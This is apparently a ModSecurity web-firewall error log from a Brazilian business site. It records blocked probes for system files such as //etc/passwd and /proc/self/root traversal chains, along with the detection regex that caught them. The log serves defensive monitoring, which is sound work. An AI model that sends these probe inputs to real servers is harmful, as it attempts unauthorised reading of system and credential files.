[Fri Mar 20 11:08:54.679747 2026] [:error] [pid 31215:tid 140411658000128] [client 216.73.216.191:36862] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc1.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1U9QF0L0L-SsrnPo6R3QAAAso"]
[Fri Mar 20 11:08:56.446770 2026] [:error] [pid 10189:tid 140411557287680] [client 57.141.18.62:36988] [client 57.141.18.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/machine-id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1U-DJ3M9BSuKP7CAZOaAAAAJY"]
[Fri Mar 20 11:08:58.875816 2026] [:error] [pid 11167:tid 140411574073088] [client 216.73.216.191:37188] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1U-vHIg5MgXLBnicMejgAAAdQ"]
[Fri Mar 20 11:09:02.455479 2026] [:error] [pid 7235:tid 140411691570944] [client 216.73.216.191:37422] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc6.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1U_vqxLDW4GITHUkQSdAAAAQY"]
[Fri Mar 20 11:09:06.696785 2026] [:error] [pid 21219:tid 140411574073088] [client 216.73.216.191:37630] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc0.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1VAfXLqtnMIWvjpaLEQQAAApQ"]
[Fri Mar 20 11:09:06.710683 2026] [:error] [pid 7235:tid 140411725141760] [client 216.73.216.191:37646] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases.db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1VAfqxLDW4GITHUkQSfAAAAQI"]
[Fri Mar 20 11:09:06.712907 2026] [:error] [pid 26799:tid 140411574073088] [client 57.141.18.66:37658] [client 57.141.18.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc5.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1VAta6ubjKNq_cu4YDFgAAA1Q"]
[Fri Mar 20 11:09:07.166630 2026] [mime_magic:error] [pid 15826:tid 140411683178240] (70014)End of file found: [client 57.141.18.30:37700] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:09:13.782304 2026] [:error] [pid 11167:tid 140411741927168] [client 216.73.216.191:38020] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dracut.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1VCfHIg5MgXLBnicMelQAAAcA"]
[Fri Mar 20 11:09:18.663307 2026] [:error] [pid 26799:tid 140411590858496] [client 57.141.18.30:38284] [client 57.141.18.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.updated"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1VDta6ubjKNq_cu4YDJQAAA1I"]
[Fri Mar 20 11:09:21.000038 2026] [:error] [pid 7893:tid 140411699963648] [client 216.73.216.191:38448] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1VEBCii7xarUs8iHaTWAAAAgU"]
[Fri Mar 20 11:09:21.840773 2026] [:error] [pid 11167:tid 140411565680384] [client 74.7.228.61:59790] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1VEfHIg5MgXLBnicMemQAAAdU"]
[Fri Mar 20 11:09:22.404052 2026] [:error] [pid 9818:tid 140411741927168] [client 216.73.216.191:38550] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1VEl1pVZ5mVmJwsFNX1wAAAEA"]
[Fri Mar 20 11:09:23.226568 2026] [:error] [pid 11642:tid 140411557287680] [client 216.73.216.191:38604] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ntp.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1VE7ninkcc-iUj5AqF5QAAA5Y"]
[Fri Mar 20 11:09:25.043007 2026] [:error] [pid 11642:tid 140411733534464] [client 216.73.216.191:38716] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ethertypes"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1VFbninkcc-iUj5AqF6QAAA4E"]
[Fri Mar 20 11:09:25.807180 2026] [:error] [pid 26799:tid 140411683178240] [client 57.141.18.26:38704] [client 57.141.18.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rc.local"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1VFda6ubjKNq_cu4YDLAAAA0c"]
[Fri Mar 20 11:09:29.508337 2026] [:error] [pid 10189:tid 140411590858496] [client 216.73.216.191:38792] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/fail2ban"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1VFzJ3M9BSuKP7CAZOgQAAAJI"]
[Fri Mar 20 11:09:51.164599 2026] [:error] [pid 7893:tid 140411616036608] [client 57.141.18.17:40248] [client 57.141.18.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/redhat-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1VLxCii7xarUs8iHaTeQAAAg8"]
[Fri Mar 20 11:09:53.339530 2026] [:error] [pid 10189:tid 140411674785536] [client 216.73.216.191:40392] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1VMTJ3M9BSuKP7CAZOmAAAAIg"]
[Fri Mar 20 11:09:54.039619 2026] [:error] [pid 21219:tid 140411632822016] [client 57.141.18.78:40454] [client 57.141.18.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/virc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1VMvXLqtnMIWvjpaLEjQAAAo0"]
[Fri Mar 20 11:09:56.707095 2026] [:error] [pid 31215:tid 140411699963648] [client 216.73.216.191:40474] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1VNAF0L0L-SsrnPo6SLQAAAsU"]
[Fri Mar 20 11:10:01.009008 2026] [:error] [pid 21219:tid 140411624429312] [client 57.141.18.42:40828] [client 57.141.18.42] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1VOfXLqtnMIWvjpaLElwAAAo4"]
[Fri Mar 20 11:10:01.288617 2026] [:error] [pid 11642:tid 140411716749056] [client 57.141.18.45:40848] [client 57.141.18.45] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1VObninkcc-iUj5AqGBwAAA4M"]
[Fri Mar 20 11:10:03.780280 2026] [:error] [pid 10189:tid 140411565680384] [client 57.141.18.26:40942] [client 57.141.18.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sasl2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1VOzJ3M9BSuKP7CAZOqgAAAJU"]
[Fri Mar 20 11:10:14.847632 2026] [:error] [pid 11167:tid 140411716749056] [client 216.73.216.191:41586] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1VRvHIg5MgXLBnicMe5QAAAcM"]
[Fri Mar 20 11:10:18.863477 2026] [:error] [pid 11167:tid 140411632822016] [client 216.73.216.191:41836] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyncd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1VSvHIg5MgXLBnicMe6wAAAc0"]
[Fri Mar 20 11:10:22.749831 2026] [mime_magic:error] [pid 21219:tid 140411540502272] (70014)End of file found: [client 57.141.18.20:42102] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:10:26.980366 2026] [:error] [pid 11167:tid 140411557287680] [client 74.7.241.31:36688] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1VUfHIg5MgXLBnicMe9QAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:10:29.139534 2026] [:error] [pid 11642:tid 140411548894976] [client 216.73.216.191:42316] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.cache"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1VVbninkcc-iUj5AqGJgAAA5c"]
[Fri Mar 20 11:10:35.777536 2026] [mime_magic:error] [pid 31215:tid 140411582465792] (70014)End of file found: [client 216.73.216.191:42836] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:10:41.647843 2026] [:error] [pid 11642:tid 140411699963648] [client 216.73.216.191:43232] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1VYbninkcc-iUj5AqGOAAAA4U"]
[Fri Mar 20 11:10:44.123489 2026] [:error] [pid 21219:tid 140411741927168] [client 74.7.244.43:52294] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1VY_XLqtnMIWvjpaLE0AAAAoA"]
